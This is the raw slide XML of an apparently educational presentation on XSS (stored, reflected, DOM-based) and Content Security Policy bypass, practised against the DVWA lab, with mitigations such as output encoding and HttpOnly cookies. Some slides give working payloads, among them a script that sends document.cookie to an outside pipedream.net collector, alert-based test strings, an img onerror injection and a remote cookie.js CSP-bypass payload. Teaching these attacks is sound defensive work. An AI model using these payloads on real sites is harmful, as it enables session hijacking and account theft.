          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4906825" y="1312975"/>
            <a:ext cx="4237176" cy="1167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XSS Stored </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;27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Prevents XSS execution with the htmlspecialchars() PHP function is used to escape characters that would be used to execute XSS payloads by html encoding characters such as &amp;, ", ', &lt;, and &gt;.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevent theft of session cookie with HttpOnly flag which is included in a Set-Cookie HTTP response header which helps mitigate the risk of the client side scripts accessing the protected cookies (if the browser supports this).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Cross-site scripting (XSS) Reflected</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4486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Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> arise when an application receives data via an HTTP request and returns data in a response in an unsafe way.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>www.welp.com?search=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script&gt;window.location="https://en0znfd3iuaxh.x.pipedream.net?cookie="+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> // this payload tests if the cookie is sent to the attackers site. Now the attacker needs to send it to a user and steal their session ID cookie.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="283" name="Google Shape;283;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5103650" y="1789112"/>
            <a:ext cx="3489501" cy="21431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of XSS Reflected</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;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Spreading worms on social media sites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identity theft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Denial of service attacks and website vandalism</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Theft of sensitive data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Financial fraud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Reflected XSS are less dangerous than stored XSS attacks because the user needs to click on the link with the reflected XSS before the payload is run. While stored XSS executes when the script is viewed by the moment the browser views the script.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XSS Reflected Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;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&lt;script&gt;alert(1);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>"&gt;&lt;script &gt;alert(document.cookie)&lt;/script &gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;a onmouseover="alert(document.cookie)"&gt;xss link&lt;/a&gt;</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS Reflected </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;30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Prevents XSS execution with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>htmlspecialchars() PHP function is used to escape characters that would be used to execute XSS payloads by html encoding characters such as &amp;,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>', &lt;, and &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevents theft of session cookie with the HttpOnly flag which is included in a Set-Cookie HTTP response header which helps mitigate the risk of the client side scripts accessing the protected cookies (if the browser supports this).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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> DOM (Document Object Model)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;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DOM-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> arises when JavaScript accepts data from attacker-controllable sources such as the URL and passes it to a sink that supports dynamic code execution which is achievable with eval() and innerHTML. Attackers can then execute malicious JavaScript which typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> them to hijack other users’ sessions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The most common source for DOM XSS is the URL, which is accessed with the window.location object. An attacker can construct a link to send the victim to a vulnerable page with a payload in the query string and fragment portions of the URL.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b="1" lang="en"/>
              <a:t>XSS DOM (Document Object Model)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>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313" name="Google Shape;313;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="45978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M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>any developers push the logic to the client-side. Some web applications use URI fragments which is the part in the URL after the # sign. This has been proven to be a convenient method of storing the user’s location within a page that keeps the browser history readable without extra round trips to the server. URI fragments are also not sent with HTTP requests so they need to be interpreted by the client-side JavaScript. This means that treatment of URI fragments must not permit the injection of malicious JavaScript.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Let’s say you’re scrolling on a web page and you see www.pinterest.com#6 which tracks the scroll location. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>www.chinterest.com#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script&gt;window.location="https://en0znfd3iuaxh.x.pipedream.net?cookie="+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> // payload similar to reflected XSS. Attacker needs to trick a user to click the link to steal their session cookie.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5399475" y="1613875"/>
            <a:ext cx="33561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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$(document).onload(function()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var </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = window.location.hash;</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loadPage(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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$("#page-no").html(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</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Notice how the window.location.hash value is written into the DOM as raw HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a major security hole.</a:t>
            </a:r>
            <a:endParaRPr sz="15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of DOM-based XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;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Spreading worms on social media sites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identity theft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Denial of service attacks and website vandalism</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Theft of sensitive data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Financial fraud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DOM-based XSS is similar to reflected XSS in that it requires the victims to click on a link. They are impossible to detect on the server side because they run on the client side because of the user of URI fragments.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XSS DOM Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;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localhost/DVWA/vulnerabilities/xss_d/?default=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>localhost/DVWA/vulnerabilities/xss_d/?default=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp;default=English</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>/vulnerabilities/xss_d/?default=English</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>/vulnerabilities/xss_d/?default=English</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>&gt;/option&gt;&lt;/select&gt;&lt;img src='x' onerror='alert(1)'&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>/vulnerabilities/xss_d/?default=English#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"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XSS DOM </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;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contents taken from the URL are encoded by default by most browsers which prevents any injected JavaScript from being executed. - DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To further prevent XSS DOM - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Avoid using data received from the client for client-side sensitive actions such as rewriting or redirection.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sanitize client-side code by inspecting references to DOM objects that pose a threat, for example, URL, location, and referrer. This is especially important if DOM may be modified.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use intrusion prevention systems that are able to inspect inbound URL parameters and prevent the inappropriate pages to be served.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevents theft of session cookie with HttpOnly is a flag which is included in a Set-Cookie HTTP response header which helps mitigate the risk of the client side scripts accessing the protected cookies (if the browser supports this).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Weakness Enumeration (CWE)s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CWE a list of software and hardware weaknesses developed by the community.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Google Shape;88;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2157400"/>
            <a:ext cx="6096000" cy="828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Content Security ByPass (CSP)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p5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CSP is a browser mechanism that is used to mitigate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> attacks and other attacks. It works by restricting resources such as scripts and images that are loaded into a page and restricting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>whether</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a page can be framed by other pages.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSP is enabled by including it an HTTP response header called Content-Security-Policy.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view CSP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;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53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1152482"/>
            <a:ext cx="9143999" cy="3961686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387950" y="334175"/>
            <a:ext cx="413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Dev Tools &gt; Network &gt; Post Request &gt; Response Headers</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CSP ByPass Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;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Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>https://digi.ninja/dvwa/cookie.js </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-contained-&gt;</a:t>
            </a:r>
